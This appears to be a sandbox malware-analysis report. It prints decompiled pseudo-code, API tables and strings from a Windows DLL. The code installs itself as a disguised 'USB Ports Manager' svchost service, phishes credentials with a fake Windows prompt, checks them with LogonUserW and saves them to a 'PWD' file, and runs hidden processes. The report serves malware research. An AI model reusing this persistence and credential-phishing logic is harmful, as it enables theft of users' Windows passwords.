								if(RegCreateKeyExA(0x80000002,  &_v1040, 0, 0, 0, 0xf023f, 0,  &_v1120, 0) == 0) {
									RegSetValueExA(_v1120, "USBPortsManagerGrp", 0, 7, "USBManager", lstrlenA("USBManager"));
									RegCloseKey(_v1120);
								}
								_t108 =  *0x6ecb047c; // 0x0
								wsprintfA( &_v1040, "%s\\%s%c%s", _t108, "svchost", 0x5c, "USBPortsManagerGrp");
								_t201 =  &(_t200[6]);
								if(RegCreateKeyExA(0x80000002,  &_v1032, 0, 0, 0, 0xf023f, 0,  &_v1112, 0) == 0) {
									E6ECA2170(_v1112, 4);
									_t201 =  &(_t201[2]);
									_v1100 = 0x2000;
									RegSetValueExA(_v1112, "AuthenticationCapabilities", 0, 4,  &_v1100, 4);
									_v1104 = 1;
									RegSetValueExA(_v1112, "CoInitializeSecurityParam", 0, 4,  &_v1104, 4);
									RegCloseKey(_v1112);
								}
								wsprintfA( &_v1032, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", "\\Parameters");
								_t202 =  &(_t201[5]);
								if(RegCreateKeyExA(0x80000002,  &_v1024, 0, 0, 0, 0xf023f, 0,  &_v1104, 0) == 0) {
									E6ECA2170(_v1104, 4);
									_t182 = M6ECB052C; // 0x21
									_t125 = M6ECB0524; // 0xcd1c70
									_t202 =  &(_t202[2]);
									RegSetValueExA(_v1104, "ServiceDLL", 0, 2, _t125, _t182 + 1);
									RegSetValueExA(_v1104, "ImagePath", 0, 2,  &_v760, _v1100 + 1);
									RegSetValueExA(_v1104, "ServiceMain", 0, 1, "SvcEntry", lstrlenA("SvcEntry"));
									_v1096 = 0;
									RegSetValueExA(_v1104, "ServiceDllUnloadOnStop", 0, 4,  &_v1096, 4);
									RegCloseKey(_v1104);
								}
								wsprintfA( &_v1024, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", 0x6ecad543);
								_t203 =  &(_t202[5]);
								if(RegCreateKeyExA(0x80000002,  &_v1016, 0, 0, 0, 0xf023f, 0,  &_v1096, 0) == 0) {
									E6ECA2170(_v1096, 4);
									_t203 =  &(_t203[2]);
									RegSetValueExA(_v1096, "ServiceMain", 0, 1, "SvcEntry", lstrlenA("SvcEntry"));
									RegCloseKey(_v1096);
								}
								E6ECA2170(_t145, 2);
								_t196 =  &(_t203[2]);
								goto L14;
							}
						}
					}
					CloseServiceHandle(_v1128);
					return _v1132;
				} else {
					_t80 = OpenSCManagerA(0, 0, 1);
					_v1108 = _t80;
					if(_t80 == 0) {
						return 0;
					} else {
						goto L2;
					}
				}
			}

0x6eca3c60
0x6eca3c7a
0x6eca3c7e
0x6eca3c80
0x6eca3c86
0x6eca3c9a
0x6eca3ca6
0x6eca3cbc
0x6eca3cc0
0x6eca3fdb
0x6eca3ff4
0x6eca3ffc
0x6eca4022
0x6eca4028
0x6eca4031
0x6eca4032
0x6eca4051
0x6eca4059
0x6eca4069
0x6eca4081
0x6eca4081
0x6eca4087
0x6eca409d
0x6eca406b
0x6eca406b
0x6eca407f
0x00000000
0x00000000
0x6eca407f
0x6eca40a4
0x6eca40a4
0x6eca40b1
0x6eca40b6
0x6eca40c4
0x6eca40c8
0x6eca40d0
0x6eca40d9
0x6eca40df
0x6eca40f2
0x6eca40f3
0x6eca40e1
0x6eca40e1
0x6eca40e7
0x6eca40ef
0x6eca40ef
0x6eca40f4
0x6eca40f5
0x6eca40fa
0x6eca40fe
0x6eca3cc6
0x6eca3cc6
0x6eca3ccc
0x6eca3cd2
0x6eca3cef
0x6eca3cf1
0x6eca3d10
0x6eca3d24
0x6eca3d28
0x6eca3d3d
0x6eca3d41
0x6eca3d45
0x6eca3d50
0x6eca3d54
0x6eca3d58
0x6eca3d5c
0x6eca3d60
0x6eca3d64
0x6eca3d68
0x6eca3d70
0x6eca3d74
0x6eca3d7a
0x6eca3d95
0x6eca3d97
0x6eca3dbb
0x6eca3ddb
0x6eca3de2
0x6eca3de2
0x6eca3de8
0x6eca3e04
0x6eca3e06
0x6eca3e2a
0x6eca3e33
0x6eca3e3c
0x6eca3e4f
0x6eca3e57
0x6eca3e6d
0x6eca3e75
0x6eca3e7c
0x6eca3e7c
0x6eca3e9b
0x6eca3e9d
0x6eca3ec1
0x6eca3ece
0x6eca3ed3
0x6eca3ed9
0x6eca3ee2
0x6eca3ef1
0x6eca3f0e
0x6eca3f2e
0x6eca3f44
0x6eca3f48
0x6eca3f4f
0x6eca3f4f
0x6eca3f6e
0x6eca3f70
0x6eca3f94
0x6eca3f9d
0x6eca3fa2
0x6eca3fc3
0x6eca3fca
0x6eca3fca
0x6eca3fd3
0x6eca3fd8
0x00000000
0x6eca3fd8
0x6eca3d28
0x6eca3ccc
0x6eca4109
0x6eca411d
0x6eca3c88
0x6eca3c8c
0x6eca3c8e
0x6eca3c94
0x6eca4129
0x00000000
0x00000000
0x00000000
0x6eca3c94

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 6ECA3C7E
OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6ECA3C8C
OpenServiceA.ADVAPI32(00000000,USBManager,000F01FF), ref: 6ECA3CAA
wsprintfA.USER32 ref: 6ECA3CEF
CreateServiceA.ADVAPI32(?,USBManager,USB Ports Manager,000F01FF,00000020,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 6ECA3D1E
ChangeServiceConfig2A.ADVAPI32 ref: 6ECA3D74
wsprintfA.USER32 ref: 6ECA3D95
RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000,?,?,?,00000000,00000002,?), ref: 6ECA3DB3
lstrlenA.KERNEL32(USBManager,?,?,?,00000000,00000002,?), ref: 6ECA3DC2
RegSetValueExA.ADVAPI32(?,USBPortsManagerGrp,00000000,00000007,USBManager,00000000,?,?,?,00000000,00000002,?), ref: 6ECA3DDB
RegCloseKey.ADVAPI32(?,?,?,?,00000000,00000002,?), ref: 6ECA3DE2
wsprintfA.USER32 ref: 6ECA3E04
RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6ECA3E22
RegSetValueExA.ADVAPI32 ref: 6ECA3E57
RegSetValueExA.ADVAPI32(00000000,CoInitializeSecurityParam,00000000,00000004,?,00000004), ref: 6ECA3E75
RegCloseKey.ADVAPI32(00000000), ref: 6ECA3E7C
wsprintfA.USER32 ref: 6ECA3E9B
RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6ECA3EB9
RegSetValueExA.ADVAPI32(?,ServiceDLL,00000000,00000002,00CD1C70,00000022), ref: 6ECA3EF1
RegSetValueExA.ADVAPI32(?,ImagePath,00000000,00000002,?,?), ref: 6ECA3F0E
lstrlenA.KERNEL32(SvcEntry), ref: 6ECA3F15
RegSetValueExA.ADVAPI32(?,ServiceMain,00000000,00000001,SvcEntry,00000000), ref: 6ECA3F2E
RegSetValueExA.ADVAPI32(?,ServiceDllUnloadOnStop,00000000,00000004,?,00000004), ref: 6ECA3F48
RegCloseKey.ADVAPI32(?), ref: 6ECA3F4F
wsprintfA.USER32 ref: 6ECA3F6E
RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6ECA3F8C
lstrlenA.KERNEL32(SvcEntry), ref: 6ECA3FAA
RegSetValueExA.ADVAPI32(?,ServiceMain,00000000,00000001,SvcEntry,00000000), ref: 6ECA3FC3
RegCloseKey.ADVAPI32(?), ref: 6ECA3FCA
wsprintfA.USER32 ref: 6ECA3FFC
RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000,\Parameters), ref: 6ECA401A
RtlZeroMemory.NTDLL(?,00000105), ref: 6ECA4032
RegQueryValueExA.ADVAPI32 ref: 6ECA4061
lstrcmpiA.KERNEL32(?,00CD1C70), ref: 6ECA4077
RegSetValueExA.ADVAPI32(?,ServiceDLL,00000000,00000002,00CD1C70,00000022), ref: 6ECA409D
RegCloseKey.ADVAPI32(?), ref: 6ECA40A4
RtlZeroMemory.NTDLL(?,00000024), ref: 6ECA40B1
QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?,?,00000024), ref: 6ECA40C8
CloseServiceHandle.ADVAPI32(00000000), ref: 6ECA40FE
CloseServiceHandle.ADVAPI32(?), ref: 6ECA4109

Strings

CoInitializeSecurityParam, xrefs: 6ECA3E67
SYSTEM\CurrentControlSet%s%s%s, xrefs: 6ECA3E95, 6ECA3F68, 6ECA3FEE
USBPortsManagerGrp, xrefs: 6ECA3CD8, 6ECA3DD5, 6ECA3DED
ServiceDLL, xrefs: 6ECA3EEB, 6ECA404B, 6ECA4097
svchost, xrefs: 6ECA3CDD, 6ECA3D85, 6ECA3DF4
USBManager, xrefs: 6ECA3CA0, 6ECA3D18, 6ECA3DBD, 6ECA3DCD, 6ECA3E87, 6ECA3F5A, 6ECA3FE0
%%SYSTEMROOT%%\system32\%s.exe -k "%s" -svcr "%s", xrefs: 6ECA3CE9
USB Ports Manager, xrefs: 6ECA3D0B
ServiceDllUnloadOnStop, xrefs: 6ECA3F3E
%s\%s%c%s, xrefs: 6ECA3D8F, 6ECA3DFE
\Services\, xrefs: 6ECA3E8C, 6ECA3F5F, 6ECA3FE5
\Parameters, xrefs: 6ECA3E82, 6ECA3FDB
ImagePath, xrefs: 6ECA3F08
SvcEntry, xrefs: 6ECA3F10, 6ECA3F20, 6ECA3FA5, 6ECA3FB5
ServiceMain, xrefs: 6ECA3F28, 6ECA3FBD
AuthenticationCapabilities, xrefs: 6ECA3E49

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$Close$CreateServicewsprintf$Openlstrlen$HandleManagerMemoryQueryZero$ChangeConfig2Statuslstrcmpi
String ID: %%SYSTEMROOT%%\system32\%s.exe -k "%s" -svcr "%s"$%s\%s%c%s$AuthenticationCapabilities$CoInitializeSecurityParam$ImagePath$SYSTEM\CurrentControlSet%s%s%s$ServiceDLL$ServiceDllUnloadOnStop$ServiceMain$SvcEntry$USB Ports Manager$USBManager$USBPortsManagerGrp$\Parameters$\Services\$svchost
API String ID: 567274075-2313540708
Opcode ID: 0d83f73535ebfdb113c9a458e0e990d7cb8b3f72ab87f4c9832c686258f54a62
Instruction ID: 269412544f9cc6b6ddcd19e06a7ca573297fd4fceb7c35bc0e6288cca0571f09
Opcode Fuzzy Hash: 0d83f73535ebfdb113c9a458e0e990d7cb8b3f72ab87f4c9832c686258f54a62
Instruction Fuzzy Hash: 1AD138B1104306BBD304DFA9CD89E6FBBBCEB89748F004D0DBB5997244E671A9048F66

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA96D0, Relevance: 77.3, APIs: 38, Strings: 6, Instructions: 346
memorysleeplibraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E6ECA96D0(intOrPtr _a4) {
				intOrPtr _v4;
				signed int _v72;
				char _v1028;
				short _v1036;
				char _v1048;
				void* _v1296;
				char _v1300;
				void* _v1304;
				intOrPtr _v1308;
				void* _v1312;
				void* _v1316;
				void* _v1320;
				intOrPtr _v1324;
				void* _v1328;
				void* _v1332;
				void* _v1336;
				intOrPtr _v1340;
				void* _v1344;
				void* _v1348;
				void* _v1352;
				char _v1356;
				WCHAR* _v1368;
				short* _v1372;
				char _v1376;
				void* _v1380;
				intOrPtr _v1384;
				void* _v1392;
				intOrPtr _v1396;
				struct HINSTANCE__* _v1400;
				void* _v1404;
				char _v1412;
				char _v1416;
				void* _v1420;
				long _v1424;
				long _v1432;
				long _v1436;
				long _v1448;
				intOrPtr _v1452;
				long _v1456;
				intOrPtr _v1472;
				char _v1480;
				char _v1496;
				intOrPtr _v1500;
				intOrPtr _v1508;
				intOrPtr _v1524;
				void* _v1532;
				intOrPtr _v1544;
				void* _v1556;
				void* _t93;
				void* _t94;
				void* _t99;
				CHAR* _t106;
				void* _t110;
				void* _t133;
				int _t140;
				signed int _t145;
				struct HDESK__* _t149;
				void* _t152;
				struct HINSTANCE__* _t154;
				void* _t155;
				WCHAR* _t156;
				WCHAR* _t157;
				struct HDESK__* _t158;
				struct HDESK__* _t171;
				WCHAR* _t174;
				WCHAR* _t180;
				struct HDESK__* _t183;
				WCHAR* _t185;
				struct HINSTANCE__* _t188;
				short* _t190;
				void* _t191;
				signed int _t195;
				signed int _t196;
				WCHAR* _t199;
				long _t200;
				short* _t202;
				void* _t204;
				void* _t205;
				void* _t206;

				_t93 = M6ECB0504; // 0xcd3fb0
				_t157 = M6ECB04F8; // 0xcd21b8
				_t94 = E6ECA5130(_t157, _t93, 0x6ecad664);
				_t204 =  &_v1416 + 0xc;
				if(_t94 != 0) {
					L39:
					return 0;
				} else {
					_t152 = 0;
					if(_a4 != 0) {
						_t183 =  *0x6ecb0480; // 0x0
						SwitchDesktop(_t183);
						_t149 =  *0x6ecb0480; // 0x0
						SetThreadDesktop(_t149);
					}
					_t188 = LoadLibraryA("credui.dll");
					_v1380 = _t188;
					if(_t188 == _t152) {
						L37:
						if(_a4 != _t152) {
							Sleep(0x7d0);
							_t158 =  *0x6ecb0484; // 0x0
							SwitchDesktop(_t158);
							_t171 =  *0x6ecb0484; // 0x0
							SetThreadDesktop(_t171);
						}
						goto L39;
					}
					_push(0xff000000);
					_push(4);
					_push( &_v1356);
					_push(_t188);
					_v1356 = 0x24bec39d;
					_v1352 = _t152;
					_v1348 = _t152;
					_v1344 = _t152;
					_v1340 = 0xb4bb2c26;
					_v1336 = _t152;
					_v1332 = _t152;
					_v1328 = _t152;
					_v1324 = 0x4b177521;
					_v1320 = _t152;
					_v1316 = _t152;
					_v1312 = _t152;
					_v1308 = 0xc07eb83e;
					_v1304 = _t152;
					_v1300 = _t152;
					_v1296 = _t152;
					_t99 = E6ECA1DB0();
					_t205 = _t204 + 0x10;
					if(_t99 == 0) {
						L36:
						FreeLibrary(_t188);
						goto L37;
					}
					_t185 = HeapAlloc(GetProcessHeap(), 8, 0x2000);
					if(_t185 == _t152) {
						L35:
						goto L36;
					}
					_push(0x14);
					_push( &_v1376);
					L6ECAC2EE();
					_v1384 = 0x14;
					_v1380 = _t152;
					_v1412 = 0x202;
					_v1396 = 0x101;
					_t26 =  &(_t185[0x657]); // 0xcae
					_t190 = _t26;
					_t27 =  &(_t185[0x6d8]); // 0xdb0
					_t199 = _t27;
					GetSystemDirectoryA( &_v1300, 0x104);
					PathAddBackslashA( &_v1300);
					_t106 = "rstrui.exe";
					if(_v4 != _t152) {
						_t106 = "wuaueng.dll";
					}
					lstrcatA( &_v1300, _t106);
					_t154 = LoadLibraryExA( &_v1300, _t152, 0x20);
					if(_t154 == 0) {
						L20:
						_t174 = M6ECB04F8; // 0xcd21b8
						_t110 = M6ECB0504; // 0xcd3fb0
						_t200 = 0;
						_t191 = 0;
						_v1392 = 0;
						_v1424 = 0;
						_v1416 = 0;
						_v1404 = 0;
						_v1420 = 0;
						wsprintfW( &_v1036, L"%s\\%s", _t110, _t174);
						_t206 = _t205 + 0x10;
						_push( &_v1412);
						_push(0);
						_push(0x6ecad664);
						_push( &_v1028);
						_push(0);
						if(_v1296() != 0 || GetLastError() != 0x7a) {
							L34:
							HeapFree(GetProcessHeap(), _t200, _t185);
							_t188 = _v1400;
							_t152 = 0;
							goto L35;
						} else {
							_t155 = HeapAlloc(GetProcessHeap(), 8, _v1432);
							_v1420 = _t155;
							if(_t155 == 0) {
								goto L34;
							}
							_push( &_v1432);
							_push(_t155);
							_push(0x6ecad664);
							_push( &_v1048);
							_push(0);
							if(_v1316() == 0) {
								L33:
								HeapFree(GetProcessHeap(), _t200, _t155);
								goto L34;
							}
							while(1) {
								L25:
								_push(0x20);
								_push( &_v1436);
								_push( &_v1448);
								_push( &_v1456);
								_push(_v1452);
								_push(_t155);
								_push( &_v1424);
								_push(_t191);
								_push( &_v1416);
								_v1432 = 1;
								_v1424 = _t200;
								_v1456 = _t200;
								_v1448 = _t200;
								_v1436 = _t200;
								if(_v1384() != 0) {
									break;
								}
								_push(0x404);
								_push(_t185);
								_v1480 = 0x202;
								L6ECAC2EE();
								_push(0x202);
								_t74 =  &(_t185[0x202]); // 0x404
								_t156 = _t74;
								_push(_t156);
								_v1472 = 0x101;
								L6ECAC2EE();
								_push( &_v1480);
								_push(_t156);
								_push(_t200);
								_push(_t200);
								_push( &_v1496);
								_push(_t185);
								_push(_v1500);
								_push(_v1508);
								_push(1);
								if(_v1420() != 0) {
									_push(0x404);
									_t81 =  &(_t185[0x303]); // 0x606
									_t202 = _t81;
									_push(_t202);
									L6ECAC2EE();
									_push(0x2a4);
									_t82 =  &(_t185[0x505]); // 0xa0a
									L6ECAC2EE();
									_push(0x152);
									_t83 =  &(_t185[0x505]); // 0xa0a
									_push(0x202);
									_push(_t202);
									_push(_t185);
									if(_v1456() == 0) {
										_t85 =  &(_t185[0x505]); // 0xa0a
										_t133 = E6ECA5130(_t202, _t85, _t156);
										_t206 = _t206 + 0xc;
										if(_t133 == 0) {
											_v1556 = 0;
											_t191 = 0x52e;
										} else {
											_t180 = M6ECB04D0; // 0xcc4128
											WritePrivateProfileStringW(L"PWD", _t185, _t156, _t180);
										}
									}
									_t200 = 0;
								}
								__imp__CoTaskMemFree(_v1544);
								_t155 = _v1532;
								if(_v1524 == _t200) {
									continue;
								} else {
									goto L33;
								}
							}
							asm("sbb esi, esi");
							_t191 = ( ~_v72 & 0xfffff693) + 0xfdb;
							Sleep(0x1f4);
							goto L25;
						}
					} else {
						_push(0x80);
						_push(_t190);
						if(_v4 != 0) {
							if(LoadStringW(_t154, 0x69, ??, ??) > 0) {
								_v1372 = _t190;
							}
							_t195 = FormatMessageW(0xaff, _t154, 0xb0000028, 0, _t199, 0x926, 0);
							_t196 = _t195 + LoadStringW(_t154, 0x184,  &(_t199[_t195]), 0x926 - _t195);
							_t140 = wsprintfW( &(_t199[_t196]), L"\r\n\r\n");
							_t205 = _t205 + 8;
							FormatMessageW(0x12ff, 0, 0x1109, 0,  &(_t199[_t196 + _t140]), 0x926 - _t196 + _t140, 0);
							L18:
							_v1368 = _t199;
							L19:
							FreeLibrary(_t154);
							goto L20;
						}
						_t145 = LoadStringW(_t154, 0xab, ??, ??);
						if(_t145 > 0) {
							_t34 = _t145 * 2; // 0xcb2
							_t190[_t145] = 0x20002e;
							if(LoadStringW(_t154, 0x91, _t190 + _t34 + 4, 0x80 - _t145) > 0) {
								_v1372 = _t190;
							}
						}
						if(LoadStringW(_t154, 0xd2, _t199, 0x926) <= 0) {
							goto L19;
						} else {
							goto L18;
						}
					}
				}
			}

0x6eca96d0
0x6eca96d5
0x6eca96e8
0x6eca96ed
0x6eca96f2
0x6eca9b97
0x6eca9b9f
0x6eca96f8
0x6eca96f9
0x6eca9703
0x6eca9705
0x6eca970c
0x6eca9712
0x6eca9718
0x6eca9718
0x6eca9729
0x6eca972b
0x6eca9731
0x6eca9b67
0x6eca9b70
0x6eca9b77
0x6eca9b7d
0x6eca9b84
0x6eca9b8a
0x6eca9b91
0x6eca9b91
0x00000000
0x6eca9b70
0x6eca9737
0x6eca973c
0x6eca9742
0x6eca9743
0x6eca9744
0x6eca974c
0x6eca9750
0x6eca9754
0x6eca9758
0x6eca9760
0x6eca9764
0x6eca9768
0x6eca976c
0x6eca9774
0x6eca9778
0x6eca977c
0x6eca9783
0x6eca978e
0x6eca9795
0x6eca979c
0x6eca97a3
0x6eca97a8
0x6eca97ad
0x6eca9b60
0x6eca9b61
0x00000000
0x6eca9b61
0x6eca97c8
0x6eca97cc
0x6eca9b5f
0x00000000
0x6eca9b5f
0x6eca97d3
0x6eca97d9
0x6eca97da
0x6eca97ec
0x6eca97f4
0x6eca97f8
0x6eca9800
0x6eca9808
0x6eca9808
0x6eca980e
0x6eca980e
0x6eca9814
0x6eca9822
0x6eca9828
0x6eca9834
0x6eca9836
0x6eca9836
0x6eca9844
0x6eca985b
0x6eca985f
0x6eca9958
0x6eca9958
0x6eca995e
0x6eca9965
0x6eca9974
0x6eca9976
0x6eca997a
0x6eca997e
0x6eca9982
0x6eca9986
0x6eca998a
0x6eca9990
0x6eca9997
0x6eca9998
0x6eca9999
0x6eca99a5
0x6eca99a6
0x6eca99b0
0x6eca9b49
0x6eca9b52
0x6eca9b58
0x6eca9b5c
0x00000000
0x6eca99c5
0x6eca99d9
0x6eca99db
0x6eca99e1
0x00000000
0x00000000
0x6eca99eb
0x6eca99ec
0x6eca99ed
0x6eca99f9
0x6eca99fa
0x6eca9a04
0x6eca9b3a
0x6eca9b43
0x00000000
0x6eca9b43
0x6eca9a10
0x6eca9a10
0x6eca9a10
0x6eca9a16
0x6eca9a1f
0x6eca9a24
0x6eca9a25
0x6eca9a26
0x6eca9a2b
0x6eca9a2c
0x6eca9a31
0x6eca9a32
0x6eca9a3a
0x6eca9a3e
0x6eca9a42
0x6eca9a46
0x6eca9a50
0x00000000
0x00000000
0x6eca9a56
0x6eca9a5b
0x6eca9a5c
0x6eca9a64
0x6eca9a69
0x6eca9a6e
0x6eca9a6e
0x6eca9a74
0x6eca9a75
0x6eca9a7d
0x6eca9a8a
0x6eca9a8f
0x6eca9a90
0x6eca9a91
0x6eca9a96
0x6eca9a97
0x6eca9a98
0x6eca9a99
0x6eca9a9a
0x6eca9aa5
0x6eca9aa7
0x6eca9aac
0x6eca9aac
0x6eca9ab2
0x6eca9ab3
0x6eca9ab8
0x6eca9abd
0x6eca9ac4
0x6eca9ac9
0x6eca9ace
0x6eca9ad5
0x6eca9ada
0x6eca9adb
0x6eca9ae5
0x6eca9ae8
0x6eca9af0
0x6eca9af5
0x6eca9afa
0x6eca9b12
0x6eca9b1a
0x6eca9afc
0x6eca9afc
0x6eca9b0a
0x6eca9b0a
0x6eca9afa
0x6eca9b1f
0x6eca9b1f
0x6eca9b26
0x6eca9b2c
0x6eca9b34
0x00000000
0x00000000
0x00000000
0x00000000
0x6eca9b34
0x6eca9bab
0x6eca9bb8
0x6eca9bbe
0x00000000
0x6eca9bbe
0x6eca9865
0x6eca986d
0x6eca9872
0x6eca9873
0x6eca98d7
0x6eca98d9
0x6eca98d9
0x6eca98f8
0x6eca9913
0x6eca991f
0x6eca9925
0x6eca9947
0x6eca994d
0x6eca994d
0x6eca9951
0x6eca9952
0x00000000
0x6eca9952
0x6eca987b
0x6eca9883
0x6eca988d
0x6eca9898
0x6eca98a7
0x6eca98a9
0x6eca98a9
0x6eca98a7
0x6eca98c1
0x00000000
0x6eca98c7
0x00000000
0x6eca98c7
0x6eca98c1
0x6eca985f

APIs

Part of subcall function 6ECA5130: LogonUserW.ADVAPI32(00CD21B8,00CD21B8,6ECA96ED,00000002,00000000,00CD3FB0), ref: 6ECA5150
Part of subcall function 6ECA5130: GetLastError.KERNEL32 ref: 6ECA515C
Part of subcall function 6ECA5130: CloseHandle.KERNEL32(?), ref: 6ECA5177

SwitchDesktop.USER32(00000000,00000000,00000000), ref: 6ECA970C
SetThreadDesktop.USER32(00000000), ref: 6ECA9718
LoadLibraryA.KERNEL32(credui.dll,00000000,00000000), ref: 6ECA9723
GetProcessHeap.KERNEL32(00000008,00002000,00000000,00000000,?,00000004,FF000000), ref: 6ECA97BB
HeapAlloc.KERNEL32(00000000), ref: 6ECA97C2
RtlZeroMemory.NTDLL(?,00000014), ref: 6ECA97DA
GetSystemDirectoryA.KERNEL32 ref: 6ECA9814
PathAddBackslashA.SHLWAPI(?), ref: 6ECA9822
lstrcatA.KERNEL32(?,rstrui.exe), ref: 6ECA9844
LoadLibraryExA.KERNEL32(?,00000000,00000020), ref: 6ECA9855
LoadStringW.USER32(00000000,000000AB,00000CAE,00000080), ref: 6ECA987B
LoadStringW.USER32(00000000,00000091,00000CB2,00000080), ref: 6ECA989F
LoadStringW.USER32(00000000,000000D2,00000DB0,00000926), ref: 6ECA98B9
FreeLibrary.KERNEL32(00000000,?,00000926,00000000,?,?,00000104,?,00000014,76D24F20), ref: 6ECA9952
wsprintfW.USER32 ref: 6ECA998A
GetLastError.KERNEL32(?,?,?,?,00000104,?,00000014,76D24F20), ref: 6ECA99B6
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,00000104,?,00000014,76D24F20), ref: 6ECA99CC
HeapAlloc.KERNEL32(00000000,?,?,?,?,00000104,?,00000014,76D24F20), ref: 6ECA99D3
RtlZeroMemory.NTDLL(00000000,00000404), ref: 6ECA9A64
RtlZeroMemory.NTDLL(00000404,00000202), ref: 6ECA9A7D
RtlZeroMemory.NTDLL(00000606,00000404), ref: 6ECA9AB3
RtlZeroMemory.NTDLL(00000A0A,000002A4), ref: 6ECA9AC4
WritePrivateProfileStringW.KERNEL32(PWD,00000000,00000404,00CC4128), ref: 6ECA9B0A
CoTaskMemFree.OLE32(?), ref: 6ECA9B26
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00000104,?,00000014,76D24F20), ref: 6ECA9B3C
HeapFree.KERNEL32(00000000,?,?,?,?,00000104,?,00000014,76D24F20), ref: 6ECA9B43
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00000104,?,00000014,76D24F20), ref: 6ECA9B4B
HeapFree.KERNEL32(00000000,?,?,?,?,00000104,?,00000014,76D24F20), ref: 6ECA9B52
FreeLibrary.KERNEL32(00000000,00000000,?,00000004,FF000000), ref: 6ECA9B61
Sleep.KERNEL32(000007D0), ref: 6ECA9B77
SwitchDesktop.USER32(00000000), ref: 6ECA9B84
SetThreadDesktop.USER32(00000000), ref: 6ECA9B91
Sleep.KERNEL32(000001F4), ref: 6ECA9BBE

Strings

%s\%s, xrefs: 6ECA996E
PWD, xrefs: 6ECA9B05
, xrefs: 6ECA9919
rstrui.exe, xrefs: 6ECA9828
credui.dll, xrefs: 6ECA971E
wuaueng.dll, xrefs: 6ECA9836, 6ECA983B

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeLoadMemoryZero$DesktopLibraryProcessString$AllocErrorLastSleepSwitchThread$BackslashCloseDirectoryHandleLogonPathPrivateProfileSystemTaskUserWritelstrcatwsprintf
String ID: $%s\%s$PWD$credui.dll$rstrui.exe$wuaueng.dll
API String ID: 938628543-1540689510
Opcode ID: caaf6a8ae9a13ef5b41b3b163e6fa4b649a18cb5852eb2c3e9757e606e77ac40
Instruction ID: 6887ada069cba990275e3ccb6a1ae90e320e59e16bf469457a859cb26b385207
Opcode Fuzzy Hash: caaf6a8ae9a13ef5b41b3b163e6fa4b649a18cb5852eb2c3e9757e606e77ac40
Instruction Fuzzy Hash: FED16DB1604705AFE7208FA9DD89F9BBBB8FB89704F00491DFA5997241E7719804CF62

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA2ED0, Relevance: 56.2, APIs: 31, Strings: 1, Instructions: 227
memoryfileprocessCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E6ECA2ED0(intOrPtr* _a12) {
				intOrPtr* _v4;
				signed int _v8;
				CHAR* _v12;
				intOrPtr _v16;
				struct _STARTUPINFOA _v84;
				struct _PROCESS_INFORMATION _v100;
				void* _v108;
				void* _v112;
				CHAR* _v116;
				void* _v120;
				void* _v124;
				void* _v128;
				intOrPtr _v132;
				long _v136;
				CHAR* _t52;
				int _t54;
				long _t69;
				intOrPtr _t82;
				long _t85;
				void* _t90;
				struct _OVERLAPPED* _t110;
				void* _t111;
				int _t112;
				int _t116;
				void* _t121;

				_t110 = 0;
				_v116 = 0;
				_t90 = 0;
				_v100.hThread.nLength = 0xc;
				_v100.dwProcessId = 0;
				_v100.dwThreadId = 1;
				_v112 = 0;
				_v108 = 0;
				if(CreatePipe( &_v112,  &_v108,  &(_v100.hThread), 0) == 0) {
					 *_a12 = 0;
					return 0;
				} else {
					_push(0x44);
					_push( &(_v84.dwX));
					L6ECAC2EE();
					_t52 = _v116;
					_push(0x10);
					_push( &(_v100.dwProcessId));
					_v84.lpDesktop = 0x44;
					_v84.lpReserved2 = 0x101;
					_v12 = _t52;
					_v16 = _t52;
					L6ECAC2EE();
					_t54 = CreateProcessA(0, _v12, 0, 0, 1, 0x8000000, 0, 0,  &_v84,  &_v100);
					CloseHandle(_v124);
					if(_t54 != 0) {
						_t111 = HeapAlloc(GetProcessHeap(), 8, 0x401);
						_v120 = _t111;
						if(_t111 != 0) {
							_v116 = GetTickCount() + _v8 * 0x3e8;
							_v136 = 0;
							if(ReadFile(_v128, _t111, 0x400,  &_v136, 0) != 0) {
								while(1) {
									_t69 = _v136;
									if(_t69 == 0) {
										goto L23;
									}
									 *((char*)(_t69 + _t111)) = 0;
									_t116 = MultiByteToWideChar(1, 0, _t111, _v136, 0, 0);
									if(_t116 != 0) {
										_t31 = _t116 + 2; // 0x2
										_t121 = HeapAlloc(GetProcessHeap(), 8, _t116 + _t31);
										if(_t121 != 0) {
											if(MultiByteToWideChar(1, 0, _t111, _v136, _t121, _t116) != 0) {
